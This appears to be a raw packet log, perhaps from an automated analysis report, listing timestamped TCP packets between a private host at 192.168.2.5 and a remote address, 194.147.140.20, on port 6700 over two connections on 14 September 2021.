Sep 14, 2021 17:03:26.505631924 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.505717993 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505753994 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.505856037 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.505932093 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.549591064 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.551397085 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.597013950 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.629426003 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.693360090 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.693614960 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.693644047 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.693679094 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.693702936 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.693816900 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.693839073 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.693844080 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.693888903 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.693926096 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.694190025 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.694375038 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.694528103 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.694540024 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.694566011 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.694603920 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.694634914 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.694658041 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.694730043 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.694744110 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.694757938 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.694951057 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.694961071 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.694992065 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695024967 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695177078 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.695178032 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695190907 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.695235014 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695348024 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695379972 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.695435047 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695465088 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695522070 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.695542097 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.695574045 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695626020 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695642948 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.695674896 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695698977 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695739985 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695755005 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.695780993 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.695787907 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.695868969 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.695885897 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.696131945 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.739214897 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.739614964 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:26.786292076 CEST	6700	49776	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:26.786597967 CEST	49776	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:31.020606995 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:31.211318016 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:31.211458921 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:31.211991072 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:31.418953896 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:31.420697927 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:31.610390902 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:31.612772942 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:31.858622074 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:31.858659983 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:31.858680964 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:31.858701944 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:31.858802080 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:31.858834028 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.049881935 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.049923897 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.049941063 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.049978018 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.049994946 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.050010920 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.050045013 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.050060987 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.050057888 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.050098896 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.239877939 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.239917994 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.239947081 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.239985943 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240019083 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240089893 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.240139008 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.240274906 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240319967 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240343094 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.240355968 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240385056 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240406036 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.240632057 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240660906 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240690947 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240725994 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.240776062 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240806103 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.240850925 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.240859032 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.240916014 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.284456968 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.429718971 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.430105925 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.430140972 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.430311918 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.430418015 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.430499077 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.430555105 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.430586100 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.430641890 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.430700064 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.430845022 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.430892944 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.430974960 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431107998 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431154966 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431194067 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.431278944 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431349993 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.431432962 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431508064 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431535006 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431566954 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431583881 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.431638002 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.431664944 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431706905 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431799889 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.431843996 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431929111 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.431976080 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.432005882 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.432056904 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.432074070 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.432123899 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.432133913 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.432197094 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.432219028 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.432255983 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.432281017 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.432303905 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.432320118 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.432415962 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.473848104 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.473908901 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.474040985 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.620898008 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.621047020 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.621093035 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.621154070 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.621174097 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.621244907 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.621289015 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.621356010 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.621398926 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.621431112 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.621584892 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.621614933 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.621709108 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.621716976 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.621803999 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.622369051 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622437954 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622478962 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622507095 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622528076 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.622553110 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622582912 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.622626066 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622649908 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622750998 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.622803926 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622827053 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622848988 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622881889 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.622903109 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.622989893 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.623011112 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.623034954 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.623073101 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.623084068 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.623096943 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.623132944 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.623145103 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.623222113 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.623280048 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.623349905 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.623418093 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.623471022 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624418020 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624449015 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624469042 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624488115 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624509096 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624519110 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.624528885 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624593019 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624599934 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.624613047 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624634981 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624650955 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624670029 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624685049 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624692917 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.624701977 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624743938 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.624756098 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624778986 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624800920 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624830008 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.624886990 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624910116 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.624929905 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.624942064 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.624944925 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.625051975 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.666944027 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.666996002 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.667198896 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.707315922 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.810969114 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.811007023 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.811031103 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.811110973 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.811182976 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.811232090 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.811232090 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.811256886 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.811289072 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.811328888 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.811431885 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.811460018 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.811487913 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.811522007 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.811711073 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.811737061 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.811788082 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.812026024 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812051058 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812083006 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.812107086 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.812175035 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812335968 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812390089 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.812449932 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812505960 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.812530994 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812582970 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.812659979 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812712908 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.812753916 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812807083 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812808990 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.812844992 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812859058 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.812899113 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.812927961 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.812983990 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.813106060 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.813152075 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.813160896 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.813204050 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.813215971 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.813267946 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.813316107 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.813338995 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.813371897 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.813401937 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.813416958 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.813469887 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.813536882 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.813590050 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.814476013 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.814512968 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.814537048 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.814600945 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.814604044 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.814660072 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.814661980 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.814678907 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.814714909 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.814770937 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.814805984 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.814891100 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.814928055 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.814945936 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.814963102 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.815016985 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.815090895 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.815139055 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.815159082 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.815207005 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.815246105 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.815273046 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.815290928 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.815440893 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:32.816138029 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:32.953933001 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.006294966 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.006369114 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.006448984 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.006508112 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.006530046 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.006556988 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.006616116 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.006642103 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.006743908 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.006752968 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.006855011 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.006901026 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.006958008 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.007036924 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.007143021 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.007167101 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.007421017 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.007486105 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.007524014 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.007631063 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.007688999 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.007714987 CEST	49777	6700	192.168.2.5	194.147.140.20
